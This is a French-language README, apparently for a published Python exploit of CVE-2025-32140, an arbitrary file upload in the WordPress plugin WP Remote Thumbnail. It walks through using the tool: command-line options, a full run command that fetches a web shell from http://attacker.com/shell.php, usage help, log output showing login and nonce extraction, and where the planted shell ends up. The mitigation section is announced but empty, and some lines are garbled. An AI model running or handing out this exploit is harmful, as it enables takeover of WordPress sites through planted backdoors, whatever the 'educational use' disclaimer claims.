
Le plugin WordPress WP Remote Thumbnail <= 1.3.2 est vulnérable au téléchargement arbitraire de fichiers.
CVE-2025-32140 est une vulnérabilité critique dans le plugin WP Remote Thumbnail pour WordPress. Elle permet à des attaquants authentifiés (disposant des autorisations de contributeur ou supérieures) de téléverser des fichiers arbitraires, tels que des web shells, en abusant d'une fonctionnalité défectueuse qui accepte des URL non assainies.
Le plugin ne parvient pas à valider le type de fichier ou le contenu récupéré à partir de l'URL remote_thumb fournie. Cela permet aux attaquants d'enregistrer des fichiers PHP malveillants (par exemple, des backdoors) dans le répertoire /wp-content/uploads.
edit_postCe script Python automatise l'exploitation de CVE-2025-32140, en effectuant les étapes suivantes :
remote_thumb.| Option | Alias | Description |
|---|---|---|
--url | -u | URL du site WordPress cible (par exemple, http://target.com/wordpress) |
--username | -un | Nom d'utilisateur WordPress disposant de privilèges d'édition d'articles |
--password | -p | Mot de passe pour le nom d'utilisateur spécifié |
--user_ID | -uid | ID utilisateur WordPress (généralement 1 pour l'administrateur) |
--post_ID | -pid | ID de l'article à modifier (peut être un brouillon) |
--shell | URL directe d'un web shell PHP hébergé sur le serveur de l'attaquant |
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
Une fois l'exploit réalisé, le web shell téléversé sera probablement stocké à l'adresse :
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
Remplacez YYYY/MM par l'année et le mois en cours du téléversement.
Pour atténuer le risque posé par cette vulnérabilité :
Ce script est fourni à des fins éducatives uniquement.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet exploit.
Par : Nxploited ( Khaled Alenazi ) 🌟